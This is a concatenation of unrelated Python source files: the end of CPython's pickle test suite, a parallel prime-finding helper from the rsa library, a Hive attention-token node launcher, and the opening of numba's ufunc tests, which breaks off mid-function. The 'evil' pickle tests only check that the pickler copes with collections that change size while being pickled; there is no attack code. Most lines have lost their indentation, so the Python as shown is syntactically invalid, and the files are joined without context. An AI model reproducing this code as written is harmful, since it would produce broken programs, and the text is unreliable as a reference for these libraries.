check_copy(arr, new)
for proto in range(5, pickle.HIGHEST_PROTOCOL + 1):
buffer_callback = lambda _: True
data = self.dumps(arr, proto, buffer_callback=buffer_callback)
new = self.loads(data)
check_copy(arr, new)
# Out-of-band
for proto in range(5, pickle.HIGHEST_PROTOCOL + 1):
buffers = []
buffer_callback = buffers.append
data = self.dumps(arr, proto, buffer_callback=buffer_callback)
new = self.loads(data, buffers=buffers)
if arr.flags.c_contiguous or arr.flags.f_contiguous:
check_no_copy(arr, new)
else:
check_copy(arr, new)
# 1-D
arr = np.arange(6)
check_array(arr)
# 1-D, non-contiguous
check_array(arr[::2])
# 2-D, C-contiguous
arr = np.arange(12).reshape((3, 4))
check_array(arr)
# 2-D, F-contiguous
check_array(arr.T)
# 2-D, non-contiguous
check_array(arr[::2])
def test_evil_class_mutating_dict(self):
# https://github.com/python/cpython/issues/92930
from random import getrandbits
global Bad
class Bad:
def __eq__(self, other):
return ENABLED
def __hash__(self):
return 42
def __reduce__(self):
if getrandbits(6) == 0:
collection.clear()
return (Bad, ())
for proto in protocols:
for _ in range(20):
ENABLED = False
collection = {Bad(): Bad() for _ in range(20)}
for bad in collection:
bad.bad = bad
bad.collection = collection
ENABLED = True
try:
data = self.dumps(collection, proto)
self.loads(data)
except RuntimeError as e:
expected = "changed size during iteration"
self.assertIn(expected, str(e))
def test_evil_pickler_mutating_collection(self):
# https://github.com/python/cpython/issues/92930
if not hasattr(self, "pickler"):
raise self.skipTest(f"{type(self)} has no associated pickler type")
global Clearer
class Clearer:
pass
def check(collection):
class EvilPickler(self.pickler):
def persistent_id(self, obj):
if isinstance(obj, Clearer):
collection.clear()
return None
pickler = EvilPickler(io.BytesIO(), proto)
try:
pickler.dump(collection)
except RuntimeError as e:
expected = "changed size during iteration"
self.assertIn(expected, str(e))
for proto in protocols:
check([Clearer()])
check([Clearer(), Clearer()])
check({Clearer()})
check({Clearer(), Clearer()})
check({Clearer(): 1})
check({Clearer(): 1, Clearer(): 2})
check({1: Clearer(), 2: Clearer()})
class BigmemPickleTests:
# Binary protocols can serialize longs of up to 2 GiB-1
@bigmemtest(size=_2G, memuse=3.6, dry_run=False)
def test_huge_long_32b(self, size):
data = 1 << (8 * size)
try:
for proto in protocols:
if proto < 2:
continue
with self.subTest(proto=proto):
with self.assertRaises((ValueError, OverflowError)):
self.dumps(data, protocol=proto)
finally:
data = None
# Protocol 3 can serialize up to 4 GiB-1 as a bytes object
# (older protocols don't have a dedicated opcode for bytes and are
# too inefficient)
@bigmemtest(size=_2G, memuse=2.5, dry_run=False)
def test_huge_bytes_32b(self, size):
data = b"abcd" * (size // 4)
try:
for proto in protocols:
if proto < 3:
continue
with self.subTest(proto=proto):
try:
pickled = self.dumps(data, protocol=proto)
header = (pickle.BINBYTES +
struct.pack("<I", len(data)))
data_start = pickled.index(data)
self.assertEqual(
header,
pickled[data_start-len(header):data_start])
finally:
pickled = None
finally:
data = None
@bigmemtest(size=_4G, memuse=2.5, dry_run=False)
def test_huge_bytes_64b(self, size):
data = b"acbd" * (size // 4)
try:
for proto in protocols:
if proto < 3:
continue
with self.subTest(proto=proto):
if proto == 3:
# Protocol 3 does not support large bytes objects.
# Verify that we do not crash when processing one.
with self.assertRaises((ValueError, OverflowError)):
self.dumps(data, protocol=proto)
continue
try:
pickled = self.dumps(data, protocol=proto)
header = (pickle.BINBYTES8 +
struct.pack("<Q", len(data)))
data_start = pickled.index(data)
self.assertEqual(
header,
pickled[data_start-len(header):data_start])
finally:
pickled = None
finally:
data = None
# All protocols use 1-byte per printable ASCII character; we add another
# byte because the encoded form has to be copied into the internal buffer.
@bigmemtest(size=_2G, memuse=8, dry_run=False)
def test_huge_str_32b(self, size):
data = "abcd" * (size // 4)
try:
for proto in protocols:
if proto == 0:
continue
with self.subTest(proto=proto):
try:
pickled = self.dumps(data, protocol=proto)
header = (pickle.BINUNICODE +
struct.pack("<I", len(data)))
data_start = pickled.index(b'abcd')
self.assertEqual(
header,
pickled[data_start-len(header):data_start])
self.assertEqual((pickled.rindex(b"abcd") + len(b"abcd") -
pickled.index(b"abcd")), len(data))
finally:
pickled = None
finally:
data = None
# BINUNICODE (protocols 1, 2 and 3) cannot carry more than 2**32 - 1 bytes
# of utf-8 encoded unicode. BINUNICODE8 (protocol 4) supports these huge
# unicode strings however.
@bigmemtest(size=_4G, memuse=8, dry_run=False)
def test_huge_str_64b(self, size):
data = "abcd" * (size // 4)
try:
for proto in protocols:
if proto == 0:
continue
with self.subTest(proto=proto):
if proto < 4:
with self.assertRaises((ValueError, OverflowError)):
self.dumps(data, protocol=proto)
continue
try:
pickled = self.dumps(data, protocol=proto)
header = (pickle.BINUNICODE8 +
struct.pack("<Q", len(data)))
data_start = pickled.index(b'abcd')
self.assertEqual(
header,
pickled[data_start-len(header):data_start])
self.assertEqual((pickled.rindex(b"abcd") + len(b"abcd") -
pickled.index(b"abcd")), len(data))
finally:
pickled = None
finally:
data = None
# Test classes for reduce_ex
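# A __reduce__/__reduce_ex__ result is a tuple of two to six items: a
# callable, its arguments, and optionally state, a list-items iterator, a
# dict-items iterator and (on newer Pythons) a state-setter callable.
# The REX_* classes below exercise the individual slots.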
class REX_one(object):
"""No __reduce_ex__ here, but inheriting it from object"""
_reduce_called = 0
def __reduce__(self):
self._reduce_called = 1
return REX_one, ()
class REX_two(object):
"""No __reduce__ here, but inheriting it from object"""
_proto = None
def __reduce_ex__(self, proto):
self._proto = proto
return REX_two, ()
class REX_three(object):
_proto = None
def __reduce_ex__(self, proto):
self._proto = proto
return REX_two, ()
def __reduce__(self):
raise TestFailed("This __reduce__ shouldn't be called")
class REX_four(object):
"""Calling base class method should succeed"""
_proto = None
def __reduce_ex__(self, proto):
self._proto = proto
return object.__reduce_ex__(self, proto)
class REX_five(object):
"""This one used to fail with infinite recursion"""
_reduce_called = 0
def __reduce__(self):
self._reduce_called = 1
return object.__reduce__(self)
class REX_six(object):
"""This class is used to check the 4th argument (list iterator) of
the reduce protocol.
"""
def __init__(self, items=None):
self.items = items if items is not None else []
def __eq__(self, other):
return type(self) is type(other) and self.items == other.items
def append(self, item):
self.items.append(item)
def __reduce__(self):
return type(self), (), None, iter(self.items), None
class REX_seven(object):
"""This class is used to check the 5th argument (dict iterator) of
the reduce protocol.
"""
def __init__(self, table=None):
self.table = table if table is not None else {}
def __eq__(self, other):
return type(self) is type(other) and self.table == other.table
def __setitem__(self, key, value):
self.table[key] = value
def __reduce__(self):
return type(self), (), None, None, iter(self.table.items())
class REX_state(object):
"""This class is used to check the 3th argument (state) of
the reduce protocol.
"""
def __init__(self, state=None):
self.state = state
def __eq__(self, other):
return type(self) is type(other) and self.state == other.state
def __setstate__(self, state):
self.state = state
def __reduce__(self):
return type(self), (), self.state
# Test classes for newobj
class MyInt(int):
sample = 1
class MyFloat(float):
sample = 1.0
class MyComplex(complex):
sample = 1.0 + 0.0j
class MyStr(str):
sample = "hello"
class MyUnicode(str):
sample = "hello \u1234"
class MyTuple(tuple):
sample = (1, 2, 3)
class MyList(list):
sample = [1, 2, 3]
class MyDict(dict):
sample = {"a": 1, "b": 2}
class MySet(set):
sample = {"a", "b"}
class MyFrozenSet(frozenset):
sample = frozenset({"a", "b"})
myclasses = [MyInt, MyFloat,
MyComplex,
MyStr, MyUnicode,
MyTuple, MyList, MyDict, MySet, MyFrozenSet]
class MyIntWithNew(int):
def __new__(cls, value):
raise AssertionError
class MyIntWithNew2(MyIntWithNew):
__new__ = int.__new__
class SlotList(MyList):
__slots__ = ["foo"]
class SimpleNewObj(int):
def __init__(self, *args, **kwargs):
# raise an error, to make sure this isn't called
raise TypeError("SimpleNewObj.__init__() didn't expect to get called")
def __eq__(self, other):
return int(self) == int(other) and self.__dict__ == other.__dict__
class ComplexNewObj(SimpleNewObj):
def __getnewargs__(self):
return ('%X' % self, 16)
class ComplexNewObjEx(SimpleNewObj):
def __getnewargs_ex__(self):
return ('%X' % self,), {'base': 16}
class BadGetattr:
def __getattr__(self, key):
self.foo
class AbstractPickleModuleTests:
def test_dump_closed_file(self):
f = open(TESTFN, "wb")
try:
f.close()
self.assertRaises(ValueError, self.dump, 123, f)
finally:
os_helper.unlink(TESTFN)
def test_load_closed_file(self):
f = open(TESTFN, "wb")
try:
f.close()
            self.assertRaises(ValueError, self.load, f)
finally:
os_helper.unlink(TESTFN)
def test_load_from_and_dump_to_file(self):
stream = io.BytesIO()
data = [123, {}, 124]
self.dump(data, stream)
stream.seek(0)
unpickled = self.load(stream)
self.assertEqual(unpickled, data)
def test_highest_protocol(self):
# Of course this needs to be changed when HIGHEST_PROTOCOL changes.
self.assertEqual(pickle.HIGHEST_PROTOCOL, 5)
def test_callapi(self):
f = io.BytesIO()
# With and without keyword arguments
self.dump(123, f, -1)
self.dump(123, file=f, protocol=-1)
self.dumps(123, -1)
self.dumps(123, protocol=-1)
self.Pickler(f, -1)
self.Pickler(f, protocol=-1)
def test_dump_text_file(self):
f = open(TESTFN, "w")
try:
for proto in protocols:
self.assertRaises(TypeError, self.dump, 123, f, proto)
finally:
f.close()
os_helper.unlink(TESTFN)
def test_incomplete_input(self):
s = io.BytesIO(b"X''.")
self.assertRaises((EOFError, struct.error, pickle.UnpicklingError), self.load, s)
def test_bad_init(self):
# Test issue3664 (pickle can segfault from a badly initialized Pickler).
# Override initialization without calling __init__() of the superclass.
class BadPickler(self.Pickler):
def __init__(self): pass
class BadUnpickler(self.Unpickler):
def __init__(self): pass
self.assertRaises(pickle.PicklingError, BadPickler().dump, 0)
self.assertRaises(pickle.UnpicklingError, BadUnpickler().load)
def check_dumps_loads_oob_buffers(self, dumps, loads):
# No need to do the full gamut of tests here, just enough to
# check that dumps() and loads() redirect their arguments
# to the underlying Pickler and Unpickler, respectively.
obj = ZeroCopyBytes(b"foo")
for proto in range(0, 5):
# Need protocol >= 5 for buffer_callback
with self.assertRaises(ValueError):
dumps(obj, protocol=proto,
buffer_callback=[].append)
for proto in range(5, pickle.HIGHEST_PROTOCOL + 1):
buffers = []
buffer_callback = buffers.append
data = dumps(obj, protocol=proto,
buffer_callback=buffer_callback)
self.assertNotIn(b"foo", data)
self.assertEqual(bytes(buffers[0]), b"foo")
# Need buffers argument to unpickle properly
with self.assertRaises(pickle.UnpicklingError):
loads(data)
new = loads(data, buffers=buffers)
self.assertIs(new, obj)
def test_dumps_loads_oob_buffers(self):
# Test out-of-band buffers (PEP 574) with top-level dumps() and loads()
self.check_dumps_loads_oob_buffers(self.dumps, self.loads)
def test_dump_load_oob_buffers(self):
# Test out-of-band buffers (PEP 574) with top-level dump() and load()
def dumps(obj, **kwargs):
f = io.BytesIO()
self.dump(obj, f, **kwargs)
return f.getvalue()
def loads(data, **kwargs):
f = io.BytesIO(data)
return self.load(f, **kwargs)
self.check_dumps_loads_oob_buffers(dumps, loads)
class AbstractPersistentPicklerTests:
# This class defines persistent_id() and persistent_load()
# functions that should be used by the pickler. All even integers
# are pickled using persistent ids.
def persistent_id(self, object):
if isinstance(object, int) and object % 2 == 0:
self.id_count += 1
return str(object)
elif object == "test_false_value":
self.false_count += 1
return ""
else:
return None
def persistent_load(self, oid):
if not oid:
self.load_false_count += 1
return "test_false_value"
else:
self.load_count += 1
object = int(oid)
assert object % 2 == 0
return object
def test_persistence(self):
L = list(range(10)) + ["test_false_value"]
for proto in protocols:
self.id_count = 0
self.false_count = 0
self.load_false_count = 0
self.load_count = 0
self.assertEqual(self.loads(self.dumps(L, proto)), L)
self.assertEqual(self.id_count, 5)
self.assertEqual(self.false_count, 1)
self.assertEqual(self.load_count, 5)
self.assertEqual(self.load_false_count, 1)
class AbstractIdentityPersistentPicklerTests:
def persistent_id(self, obj):
return obj
def persistent_load(self, pid):
return pid
def _check_return_correct_type(self, obj, proto):
unpickled = self.loads(self.dumps(obj, proto))
self.assertIsInstance(unpickled, type(obj))
self.assertEqual(unpickled, obj)
def test_return_correct_type(self):
for proto in protocols:
# Protocol 0 supports only ASCII strings.
if proto == 0:
self._check_return_correct_type("abc", 0)
else:
for obj in [b"abc\n", "abc\n", -1, -1.1 * 0.1, str]:
self._check_return_correct_type(obj, proto)
def test_protocol0_is_ascii_only(self):
non_ascii_str = "\N{EMPTY SET}"
self.assertRaises(pickle.PicklingError, self.dumps, non_ascii_str, 0)
pickled = pickle.PERSID + non_ascii_str.encode('utf-8') + b'\n.'
self.assertRaises(pickle.UnpicklingError, self.loads, pickled)
class AbstractPicklerUnpicklerObjectTests:
pickler_class = None
unpickler_class = None
def setUp(self):
assert self.pickler_class
assert self.unpickler_class
def test_clear_pickler_memo(self):
# To test whether clear_memo() has any effect, we pickle an object,
# then pickle it again without clearing the memo; the two serialized
# forms should be different. If we clear_memo() and then pickle the
# object again, the third serialized form should be identical to the
# first one we obtained.
data = ["abcdefg", "abcdefg", 44]
for proto in protocols:
f = io.BytesIO()
pickler = self.pickler_class(f, proto)
pickler.dump(data)
first_pickled = f.getvalue()
# Reset BytesIO object.
f.seek(0)
f.truncate()
pickler.dump(data)
second_pickled = f.getvalue()
# Reset the Pickler and BytesIO objects.
pickler.clear_memo()
f.seek(0)
f.truncate()
pickler.dump(data)
third_pickled = f.getvalue()
self.assertNotEqual(first_pickled, second_pickled)
self.assertEqual(first_pickled, third_pickled)
def test_priming_pickler_memo(self):
# Verify that we can set the Pickler's memo attribute.
data = ["abcdefg", "abcdefg", 44]
f = io.BytesIO()
pickler = self.pickler_class(f)
pickler.dump(data)
first_pickled = f.getvalue()
f = io.BytesIO()
primed = self.pickler_class(f)
primed.memo = pickler.memo
primed.dump(data)
primed_pickled = f.getvalue()
self.assertNotEqual(first_pickled, primed_pickled)
def test_priming_unpickler_memo(self):
# Verify that we can set the Unpickler's memo attribute.
data = ["abcdefg", "abcdefg", 44]
f = io.BytesIO()
pickler = self.pickler_class(f)
pickler.dump(data)
first_pickled = f.getvalue()
f = io.BytesIO()
primed = self.pickler_class(f)
primed.memo = pickler.memo
primed.dump(data)
primed_pickled = f.getvalue()
unpickler = self.unpickler_class(io.BytesIO(first_pickled))
unpickled_data1 = unpickler.load()
self.assertEqual(unpickled_data1, data)
primed = self.unpickler_class(io.BytesIO(primed_pickled))
primed.memo = unpickler.memo
unpickled_data2 = primed.load()
primed.memo.clear()
self.assertEqual(unpickled_data2, data)
self.assertTrue(unpickled_data2 is unpickled_data1)
def test_reusing_unpickler_objects(self):
data1 = ["abcdefg", "abcdefg", 44]
f = io.BytesIO()
pickler = self.pickler_class(f)
pickler.dump(data1)
pickled1 = f.getvalue()
data2 = ["abcdefg", 44, 44]
f = io.BytesIO()
pickler = self.pickler_class(f)
pickler.dump(data2)
pickled2 = f.getvalue()
f = io.BytesIO()
f.write(pickled1)
f.seek(0)
unpickler = self.unpickler_class(f)
self.assertEqual(unpickler.load(), data1)
f.seek(0)
f.truncate()
f.write(pickled2)
f.seek(0)
self.assertEqual(unpickler.load(), data2)
def _check_multiple_unpicklings(self, ioclass, *, seekable=True):
for proto in protocols:
with self.subTest(proto=proto):
data1 = [(x, str(x)) for x in range(2000)] + [b"abcde", len]
f = ioclass()
pickler = self.pickler_class(f, protocol=proto)
pickler.dump(data1)
pickled = f.getvalue()
N = 5
f = ioclass(pickled * N)
unpickler = self.unpickler_class(f)
for i in range(N):
if seekable:
pos = f.tell()
self.assertEqual(unpickler.load(), data1)
if seekable:
self.assertEqual(f.tell(), pos + len(pickled))
self.assertRaises(EOFError, unpickler.load)
def test_multiple_unpicklings_seekable(self):
self._check_multiple_unpicklings(io.BytesIO)
def test_multiple_unpicklings_unseekable(self):
self._check_multiple_unpicklings(UnseekableIO, seekable=False)
def test_multiple_unpicklings_minimal(self):
# File-like object that doesn't support peek() and readinto()
# (bpo-39681)
self._check_multiple_unpicklings(MinimalIO, seekable=False)
def test_unpickling_buffering_readline(self):
# Issue #12687: the unpickler's buffering logic could fail with
# text mode opcodes.
data = list(range(10))
for proto in protocols:
for buf_size in range(1, 11):
f = io.BufferedRandom(io.BytesIO(), buffer_size=buf_size)
pickler = self.pickler_class(f, protocol=proto)
pickler.dump(data)
f.seek(0)
unpickler = self.unpickler_class(f)
self.assertEqual(unpickler.load(), data)
# Tests for dispatch_table attribute
REDUCE_A = 'reduce_A'
class AAA(object):
def __reduce__(self):
return str, (REDUCE_A,)
class BBB(object):
def __init__(self):
# Add an instance attribute to enable state-saving routines at pickling
# time.
self.a = "some attribute"
def __setstate__(self, state):
self.a = "BBB.__setstate__"
def setstate_bbb(obj, state):
"""Custom state setter for BBB objects
    Such a callable may be created by people other than the authors of the BBB
    class. If passed as the state_setter item of a custom reducer, it allows
    for custom state-setting behavior of BBB objects. One can think of it as
    the analogue of list_setitems or dict_setitems, but for foreign
    classes/functions.
"""
obj.a = "custom state_setter"
class AbstractCustomPicklerClass:
"""Pickler implementing a reducing hook using reducer_override."""
def reducer_override(self, obj):
obj_name = getattr(obj, "__name__", None)
if obj_name == 'f':
# asking the pickler to save f as 5
return int, (5, )
if obj_name == 'MyClass':
return str, ('some str',)
elif obj_name == 'g':
# in this case, the callback returns an invalid result (not a 2-5
# tuple or a string), the pickler should raise a proper error.
return False
elif obj_name == 'h':
# Simulate a case when the reducer fails. The error should
# be propagated to the original ``dump`` call.
raise ValueError('The reducer just failed')
return NotImplemented
class AbstractHookTests:
def test_pickler_hook(self):
# test the ability of a custom, user-defined CPickler subclass to
# override the default reducing routines of any type using the method
# reducer_override
def f():
pass
def g():
pass
def h():
pass
class MyClass:
pass
for proto in range(0, pickle.HIGHEST_PROTOCOL + 1):
with self.subTest(proto=proto):
bio = io.BytesIO()
p = self.pickler_class(bio, proto)
p.dump([f, MyClass, math.log])
new_f, some_str, math_log = pickle.loads(bio.getvalue())
self.assertEqual(new_f, 5)
self.assertEqual(some_str, 'some str')
# math.log does not have its usual reducer overridden, so the
# custom reduction callback should silently direct the pickler
# to the default pickling by attribute, by returning
# NotImplemented
self.assertIs(math_log, math.log)
with self.assertRaises(pickle.PicklingError):
p.dump(g)
with self.assertRaisesRegex(
ValueError, 'The reducer just failed'):
p.dump(h)
@support.cpython_only
def test_reducer_override_no_reference_cycle(self):
# bpo-39492: reducer_override used to induce a spurious reference cycle
# inside the Pickler object, that could prevent all serialized objects
# from being garbage-collected without explicitly invoking gc.collect.
for proto in range(0, pickle.HIGHEST_PROTOCOL + 1):
with self.subTest(proto=proto):
def f():
pass
wr = weakref.ref(f)
bio = io.BytesIO()
p = self.pickler_class(bio, proto)
p.dump(f)
new_f = pickle.loads(bio.getvalue())
assert new_f == 5
del p
del f
self.assertIsNone(wr())
class AbstractDispatchTableTests:
def test_default_dispatch_table(self):
# No dispatch_table attribute by default
f = io.BytesIO()
p = self.pickler_class(f, 0)
with self.assertRaises(AttributeError):
p.dispatch_table
self.assertFalse(hasattr(p, 'dispatch_table'))
def test_class_dispatch_table(self):
# A dispatch_table attribute can be specified class-wide
dt = self.get_dispatch_table()
class MyPickler(self.pickler_class):
dispatch_table = dt
def dumps(obj, protocol=None):
f = io.BytesIO()
p = MyPickler(f, protocol)
self.assertEqual(p.dispatch_table, dt)
p.dump(obj)
return f.getvalue()
self._test_dispatch_table(dumps, dt)
def test_instance_dispatch_table(self):
# A dispatch_table attribute can also be specified instance-wide
dt = self.get_dispatch_table()
def dumps(obj, protocol=None):
f = io.BytesIO()
p = self.pickler_class(f, protocol)
p.dispatch_table = dt
self.assertEqual(p.dispatch_table, dt)
p.dump(obj)
return f.getvalue()
self._test_dispatch_table(dumps, dt)
def _test_dispatch_table(self, dumps, dispatch_table):
def custom_load_dump(obj):
return pickle.loads(dumps(obj, 0))
def default_load_dump(obj):
return pickle.loads(pickle.dumps(obj, 0))
# pickling complex numbers using protocol 0 relies on copyreg
# so check pickling a complex number still works
z = 1 + 2j
self.assertEqual(custom_load_dump(z), z)
self.assertEqual(default_load_dump(z), z)
# modify pickling of complex
REDUCE_1 = 'reduce_1'
def reduce_1(obj):
return str, (REDUCE_1,)
dispatch_table[complex] = reduce_1
self.assertEqual(custom_load_dump(z), REDUCE_1)
self.assertEqual(default_load_dump(z), z)
# check picklability of AAA and BBB
a = AAA()
b = BBB()
self.assertEqual(custom_load_dump(a), REDUCE_A)
self.assertIsInstance(custom_load_dump(b), BBB)
self.assertEqual(default_load_dump(a), REDUCE_A)
self.assertIsInstance(default_load_dump(b), BBB)
# modify pickling of BBB
dispatch_table[BBB] = reduce_1
self.assertEqual(custom_load_dump(a), REDUCE_A)
self.assertEqual(custom_load_dump(b), REDUCE_1)
self.assertEqual(default_load_dump(a), REDUCE_A)
self.assertIsInstance(default_load_dump(b), BBB)
# revert pickling of BBB and modify pickling of AAA
REDUCE_2 = 'reduce_2'
def reduce_2(obj):
return str, (REDUCE_2,)
dispatch_table[AAA] = reduce_2
del dispatch_table[BBB]
self.assertEqual(custom_load_dump(a), REDUCE_2)
self.assertIsInstance(custom_load_dump(b), BBB)
self.assertEqual(default_load_dump(a), REDUCE_A)
self.assertIsInstance(default_load_dump(b), BBB)
# End-to-end testing of save_reduce with the state_setter keyword
# argument. This is a dispatch_table test as the primary goal of
# state_setter is to tweak objects reduction behavior.
# In particular, state_setter is useful when the default __setstate__
# behavior is not flexible enough.
# No custom reducer for b has been registered for now, so
# BBB.__setstate__ should be used at unpickling time
self.assertEqual(default_load_dump(b).a, "BBB.__setstate__")
def reduce_bbb(obj):
return BBB, (), obj.__dict__, None, None, setstate_bbb
dispatch_table[BBB] = reduce_bbb
# The custom reducer reduce_bbb includes a state setter, that should
# have priority over BBB.__setstate__
self.assertEqual(custom_load_dump(b).a, "custom state_setter")
if __name__ == "__main__":
# Print some stuff that can be used to rewrite DATA{0,1,2}
from pickletools import dis
x = create_data()
for i in range(pickle.HIGHEST_PROTOCOL+1):
p = pickle.dumps(x, i)
print("DATA{0} = (".format(i))
for j in range(0, len(p), 20):
b = bytes(p[j:j+20])
print(" {0!r}".format(b))
print(")")
print()
print("# Disassembly of DATA{0}".format(i))
print("DATA{0}_DIS = \"\"\"\\".format(i))
dis(p)
print("\"\"\"")
print()
|
parallel.py
|
import multiprocessing as mp
import rsa.prime
import rsa.randnum
def _find_prime(nbits: int, pipe) -> None:
while True:
integer = rsa.randnum.read_random_odd_int(nbits)
if rsa.prime.is_prime(integer):
pipe.send(integer)
return
def getprime(nbits: int, poolsize: int) -> int:
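    """Return a prime of roughly ``nbits`` bits, searched for in parallel.

    ``poolsize`` worker processes each draw random odd integers and
    primality-test them; the first prime reported over the pipe is returned
    and the remaining workers are terminated.
    """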
(pipe_recv, pipe_send) = mp.Pipe(duplex=False)
# Create processes
try:
procs = [mp.Process(target=_find_prime, args=(nbits, pipe_send))
for _ in range(poolsize)]
# Start processes
for p in procs:
p.start()
result = pipe_recv.recv()
finally:
pipe_recv.close()
pipe_send.close()
# Terminate processes
for p in procs:
p.terminate()
return result
__all__ = ['getprime']
|
run_hat.py
|
import os
from hive_attention_tokens.config import Config
from hive_attention_tokens.chain.base.blockchain import Blockchain, BlockchainState
from hive_attention_tokens.chain.base.witness import BlockSchedule
from hive_attention_tokens.chain.base.auth import HiveAccounts
from hive_attention_tokens.chain.database.setup import DbSetup
from hive_attention_tokens.chain.database.handlers import AttentionTokensDb
from hive_attention_tokens.chain.database.access import DbAccess
from hive_attention_tokens.server.serve import run_server
from threading import Thread
def run():
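    # Rough flow, inferred from the calls below: initialise Hive account auth,
    # replay any blocks already stored in the database (otherwise create the
    # genesis state), start the block-production schedule in a background
    # thread, then serve the API.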
config = Config.config
HiveAccounts.init(BlockchainState)
db_head_block = Blockchain.has_db_blocks()
# TODO: load all accounts
if db_head_block:
BlockchainState.state_replaying()
for i in range(db_head_block[0]+1):
Blockchain.process_existing_block(i)
BlockchainState.update_cur_block(
db_head_block[0],
db_head_block[1],
db_head_block[2]
) # temp
else:
BlockchainState.state_genesis()
Blockchain.create_genesis_state()
Thread(target=BlockSchedule.block_schedule).start()
run_server(config)
if __name__ == "__main__":
run()
|
test_ufuncs.py
|
import functools
import itertools
import re
import sys
import warnings
import threading
import operator
import numpy as np
import unittest
from numba import typeof, njit
from numba.core import types, typing, utils
from numba.core.compiler import compile_isolated, Flags, DEFAULT_FLAGS
from numba.np.numpy_support import from_dtype
from numba import jit, vectorize
from numba.core.errors import LoweringError, TypingError
from numba.tests.support import TestCase, CompilationCache, MemoryLeakMixin, tag
from numba.core.typing.npydecl import supported_ufuncs, all_ufuncs
from numba.np import numpy_support
from numba.core.registry import cpu_target
from numba.core.base import BaseContext
from numba.np import ufunc_db
is32bits = tuple.__itemsize__ == 4
iswindows = sys.platform.startswith('win32')
# NOTE: to test the implementation of Numpy ufuncs, we disable rewriting
# of array expressions.
enable_pyobj_flags = Flags()
enable_pyobj_flags.enable_pyobject = True
enable_pyobj_flags.no_rewrites = True
no_pyobj_flags = Flags()
no_pyobj_flags.no_rewrites = True
enable_nrt_flags = Flags()
enable_nrt_flags.nrt = True
enable_nrt_flags.no_rewrites = True
def _unimplemented(func):
"""An 'expectedFailure' like decorator that only expects compilation errors
caused by unimplemented functions that fail in no-python mode"""
@functools.wraps(func)
def wrapper(*args, **kwargs):
try:
func(*args, **kwargs)
except TypingError:
raise unittest._ExpectedFailure(sys.exc_info())
        raise unittest._UnexpectedSuccess
    return wrapper
def _make_ufunc_usecase(ufunc):
ldict = {}
arg_str = ','.join(['a{0}'.format(i) for i in range(ufunc.nargs)])
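    # For a binary ufunc such as np.add (nin=2, nout=1, so nargs=3) this
    # builds and exec()s source along the lines of
    #     def fn(a0,a1,a2):
    #         np.add(a0,a1,a2)
    # i.e. the output array(s) are passed as trailing positional arguments.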
func_str = 'def fn({0}):\n np.{1}({0})'.format(arg_str, ufunc.__name__)
exec(func_str, globals(), ldict)
fn = ldict['fn']
fn.__name__ = '{0}_usecase'.format(ufunc.__name__)
return fn
def _make_unary_ufunc_op_usecase(ufunc_op):
ldict = {}
exec("def fn(x):\n return {0}(x)".format(ufunc_op), globals(), ldict)
fn = ldict["fn"]
fn.__name__ = "usecase_{0}".format(hash(ufunc_op))
return fn
def _make_binary_ufunc_op_usecase(ufunc_op):
ldict = {}
exec("def fn(x,y):\n return x{0}y".format(ufunc_op), globals(), ldict)
fn = ldict["fn"]
fn.__name__ = "usecase_{0}".format(hash(ufunc_op))
return fn
def _make_inplace_ufunc_op_usecase(ufunc_op):
"""Generates a function to be compiled that performs an inplace operation
ufunc_op can be a string like '+=' or a function like operator.iadd
"""
if isinstance(ufunc_op, str):
ldict = {}
exec("def fn(x,y):\n x{0}y".format(ufunc_op), globals(), ldict)
fn = ldict["fn"]
fn.__name__ = "usecase_{0}".format(hash(ufunc_op))
else:
def inplace_op(x, y):
ufunc_op(x, y)
fn = inplace_op
return fn
def _as_dtype_value(tyargs, args):
"""Convert python values into numpy scalar objects.
"""
return [np.dtype(str(ty)).type(val) for ty, val in zip(tyargs, args)]
class BaseUFuncTest(MemoryLeakMixin):
def setUp(self):
super(BaseUFuncTest, self).setUp()
self.inputs = [
(np.uint32(0), types.uint32),
(np.uint32(1), types.uint32),
(np.int32(-1), types.int32),
(np.int32(0), types.int32),
(np.int32(1), types.int32),
(np.uint64(0), types.uint64),
(np.uint64(1), types.uint64),
(np.int64(-1), types.int64),
(np.int64(0), types.int64),
(np.int64(1), types.int64),
(np.float32(-0.5), types.float32),
(np.float32(0.0), types.float32),
(np.float32(0.5), types.float32),
(np.float64(-0.5), types.float64),
(np.float64(0.0), types.float64),
(np.float64(0.5), types.float64),
(np.array([0,1], dtype='u4'), types.Array(types.uint32, 1, 'C')),
(np.array([0,1], dtype='u8'), types.Array(types.uint64, 1, 'C')),
(np.array([-1,0,1], dtype='i4'), types.Array(types.int32, 1, 'C')),
(np.array([-1,0,1], dtype='i8'), types.Array(types.int64, 1, 'C')),
(np.array([-0.5, 0.0, 0.5], dtype='f4'), types.Array(types.float32, 1, 'C')),
(np.array([-0.5, 0.0, 0.5], dtype='f8'), types.Array(types.float64, 1, 'C')),
(np.array([0,1], dtype=np.int8), types.Array(types.int8, 1, 'C')),
(np.array([0,1], dtype=np.int16), types.Array(types.int16, 1, 'C')),
(np.array([0,1], dtype=np.uint8), types.Array(types.uint8, 1, 'C')),
(np.array([0,1], dtype=np.uint16), types.Array(types.uint16, 1, 'C')),
]
self.cache = CompilationCache()
def _determine_output_type(self, input_type, int_output_type=None,
float_output_type=None):
ty = input_type
if isinstance(ty, types.Array):
ty = ty.dtype
if ty in types.signed_domain:
if int_output_type:
output_type = types.Array(int_output_type, 1, 'C')
else:
output_type = types.Array(ty, 1, 'C')
elif ty in types.unsigned_domain:
if int_output_type:
output_type = types.Array(int_output_type, 1, 'C')
else:
output_type = types.Array(ty, 1, 'C')
else:
if float_output_type:
output_type = types.Array(float_output_type, 1, 'C')
else:
output_type = types.Array(ty, 1, 'C')
return output_type
class TestUFuncs(BaseUFuncTest, TestCase):
def basic_ufunc_test(self, ufunc, flags=no_pyobj_flags,
skip_inputs=[], additional_inputs=[],
int_output_type=None, float_output_type=None,
kinds='ifc', positive_only=False):
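        # Harness outline: for every input that passes the skip filters,
        # compile the generated usecase for the explicit (inputs..., outputs...)
        # signature, run both the NumPy and the compiled version with
        # preallocated output arrays, and compare element-wise to ~5 decimal
        # places (mismatches are tolerated when the input triggered an
        # "invalid value" RuntimeWarning).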
# Necessary to avoid some Numpy warnings being silenced, despite
# the simplefilter() call below.
self.reset_module_warnings(__name__)
pyfunc = _make_ufunc_usecase(ufunc)
inputs = list(self.inputs) + additional_inputs
for input_tuple in inputs:
input_operand = input_tuple[0]
input_type = input_tuple[1]
is_tuple = isinstance(input_operand, tuple)
if is_tuple:
args = input_operand
else:
args = (input_operand,) * ufunc.nin
if input_type in skip_inputs:
continue
if positive_only and np.any(args[0] < 0):
continue
# Some ufuncs don't allow all kinds of arguments
